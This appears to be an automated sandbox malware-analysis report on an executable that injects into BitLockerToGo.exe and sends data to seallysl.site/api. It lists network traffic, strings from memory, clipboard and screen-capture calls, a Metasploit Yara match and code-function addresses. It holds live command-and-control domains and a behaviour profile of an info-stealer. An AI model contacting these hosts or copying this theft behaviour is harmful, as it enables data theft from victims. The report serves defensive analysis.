Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 574762Host: seallysl.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: seallysl.site

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: servicedny.site
Source: global traffic	DNS traffic detected: DNS query: seallysl.site

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: seallysl.site

Source: BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: BitLockerToGo.exe, 00000002.00000003.2557453027.000000000300E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://earth.google.com/kml/2.0
Source: file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://earth.google.com/kml/2.1
Source: file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://earth.google.com/kml/2.2
Source: file.exe, program.js.0.dr	String found in binary or memory: http://json-schema.org/draft-07/schema
Source: program.js.0.dr	String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: file.exe, program.js.0.dr	String found in binary or memory: http://json-schema.org/schema
Source: BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000002.2423108104.0000000002416000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema
Source: file.exe, 00000000.00000002.2423108104.000000000241E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2
Source: file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.opengis.net/gml
Source: file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.opengis.net/gml/3.2
Source: file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.opengis.net/gml/3.3/exr
Source: file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.opengis.net/kml/2.2
Source: file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.topografix.com/GPX/1/1
Source: BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, program.js.0.dr	String found in binary or memory: https://aws.amazon.com
Source: BitLockerToGo.exe, 00000002.00000003.2485863021.00000000052B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000002.00000003.2485863021.00000000052B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, program.js.0.dr	String found in binary or memory: https://github.com/aws/jsii
Source: file.exe, program.js.0.dr	String found in binary or memory: https://github.com/aws/jsii.git
Source: file.exe, program.js.0.dr	String found in binary or memory: https://github.com/aws/jsii/issues
Source: program.js.0.dr	String found in binary or memory: https://github.com/jprichardson/node-fs-extra/issues/269
Source: BitLockerToGo.exe, 00000002.00000003.2485863021.00000000052B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: program.js.0.dr	String found in binary or memory: https://raw.githubusercontent.com/ajv-validator/ajv/master/lib/refs/data.json#
Source: BitLockerToGo.exe, 00000002.00000003.2483985363.000000000301B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2557511485.0000000003034000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2500758150.00000000052C1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2484195825.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/
Source: BitLockerToGo.exe, 00000002.00000003.2557453027.0000000003012000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/8
Source: BitLockerToGo.exe, 00000002.00000003.2516470970.00000000052C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/DQ
Source: BitLockerToGo.exe, 00000002.00000003.2485459206.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2484428826.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2500622439.000000000301B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2484171723.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2483985363.000000000301B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/G
Source: BitLockerToGo.exe, 00000002.00000002.2571729075.0000000003034000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/U
Source: BitLockerToGo.exe, 00000002.00000003.2537937625.000000000302A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2571470730.0000000002F9D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2502495771.000000000302A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2502388352.00000000052BF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2568341431.0000000002FB6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2500796063.00000000052BE000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2557511485.0000000003034000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2571711174.000000000302D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2500775280.00000000052BA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2500758150.00000000052C1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2484195825.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/api
Source: BitLockerToGo.exe, 00000002.00000002.2571729075.0000000003034000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/apid
Source: BitLockerToGo.exe, 00000002.00000003.2568341431.0000000002F9D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2571470730.0000000002F9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/apigsp
Source: BitLockerToGo.exe, 00000002.00000003.2470478050.00000000052C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/apiture
Source: BitLockerToGo.exe, 00000002.00000003.2485459206.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2484428826.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2484171723.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2483985363.000000000301B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/b
Source: BitLockerToGo.exe, 00000002.00000003.2502388352.00000000052C2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2484010683.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2470478050.00000000052C0000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2500758150.00000000052C1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2484195825.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/gfj
Source: BitLockerToGo.exe, 00000002.00000002.2571585252.0000000003017000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/p
Source: BitLockerToGo.exe, 00000002.00000003.2502274755.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2502460777.0000000003031000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site:443/api
Source: BitLockerToGo.exe, 00000002.00000002.2571585252.000000000301E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site:443/api=usere
Source: BitLockerToGo.exe, 00000002.00000003.2500622439.000000000301B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site:443/apiM)
Source: BitLockerToGo.exe, 00000002.00000003.2485547940.00000000053D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BitLockerToGo.exe, 00000002.00000003.2485547940.00000000053D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BitLockerToGo.exe, 00000002.00000003.2485411107.00000000052F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: BitLockerToGo.exe, 00000002.00000003.2485411107.00000000052F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: BitLockerToGo.exe, 00000002.00000003.2485547940.00000000053D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: BitLockerToGo.exe, 00000002.00000003.2485547940.00000000053D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: BitLockerToGo.exe, 00000002.00000003.2485547940.00000000053D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig

Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834

Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49905 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_00435210 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_00435210

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_00435210 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_00435210

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_004359B7 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_004359B7

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2425522416.000000000288C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004100C5	2_2_004100C5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042509D	2_2_0042509D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00410118	2_2_00410118
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00410130	2_2_00410130
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043A2E0	2_2_0043A2E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041D5AF	2_2_0041D5AF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00444620	2_2_00444620
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042A6D0	2_2_0042A6D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00426800	2_2_00426800
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040F970	2_2_0040F970
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043A97E	2_2_0043A97E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042EB60	2_2_0042EB60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00401000	2_2_00401000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004431D0	2_2_004431D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004331DE	2_2_004331DE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004291E0	2_2_004291E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004241E0	2_2_004241E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00442EB0	2_2_00442EB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040F250	2_2_0040F250
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040B260	2_2_0040B260
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040A270	2_2_0040A270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043E230	2_2_0043E230
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004432C0	2_2_004432C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004012D5	2_2_004012D5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041E298	2_2_0041E298
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00408340	2_2_00408340
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00401328	2_2_00401328
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042C3E0	2_2_0042C3E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00442380	2_2_00442380
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004433B0	2_2_004433B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042F4DD	2_2_0042F4DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00429494	2_2_00429494
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004094BF	2_2_004094BF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041F510	2_2_0041F510
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004255A4	2_2_004255A4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004335B0	2_2_004335B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042D642	2_2_0042D642
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042762D	2_2_0042762D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004386FE	2_2_004386FE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004226A0	2_2_004226A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042762D	2_2_0042762D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040D760	2_2_0040D760
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00441720	2_2_00441720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00443720	2_2_00443720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040A730	2_2_0040A730
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00429494	2_2_00429494
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042B7D9	2_2_0042B7D9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042B7FE	2_2_0042B7FE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00442850	2_2_00442850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041482A	2_2_0041482A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004038E0	2_2_004038E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00439940	2_2_00439940
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00407960	2_2_00407960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00444920	2_2_00444920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00431980	2_2_00431980
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042AA40	2_2_0042AA40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042CA72	2_2_0042CA72
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00420A24	2_2_00420A24
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00421B40	2_2_00421B40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040DB20	2_2_0040DB20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00415BD8	2_2_00415BD8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00439BA0	2_2_00439BA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00414BBF	2_2_00414BBF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00444C50	2_2_00444C50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00434C60	2_2_00434C60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042AC04	2_2_0042AC04
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043EC20	2_2_0043EC20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040ECC0	2_2_0040ECC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00427CD2	2_2_00427CD2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041ECDE	2_2_0041ECDE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040BD70	2_2_0040BD70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00429D00	2_2_00429D00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040ADD0	2_2_0040ADD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00432D80	2_2_00432D80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00408DA0	2_2_00408DA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00422E50	2_2_00422E50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00416E10	2_2_00416E10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042BE10	2_2_0042BE10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00442EB0	2_2_00442EB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00406F60	2_2_00406F60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00428F00	2_2_00428F00
